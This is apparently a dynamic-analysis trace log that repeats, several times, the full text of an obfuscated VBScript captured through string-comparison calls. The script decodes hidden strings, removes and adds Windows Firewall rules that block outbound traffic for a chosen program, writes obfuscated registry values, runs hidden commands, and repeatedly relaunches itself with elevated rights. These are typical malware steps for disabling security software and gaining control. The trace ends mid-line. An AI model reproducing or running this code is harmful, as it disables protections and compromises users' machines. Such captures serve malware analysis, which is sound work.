bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.938] wcsncmp (_String1="x = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0222.938] wcsncmp (_String1=" = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.938] wcsncmp (_String1="= \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.938] wcsncmp (_String1=" \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 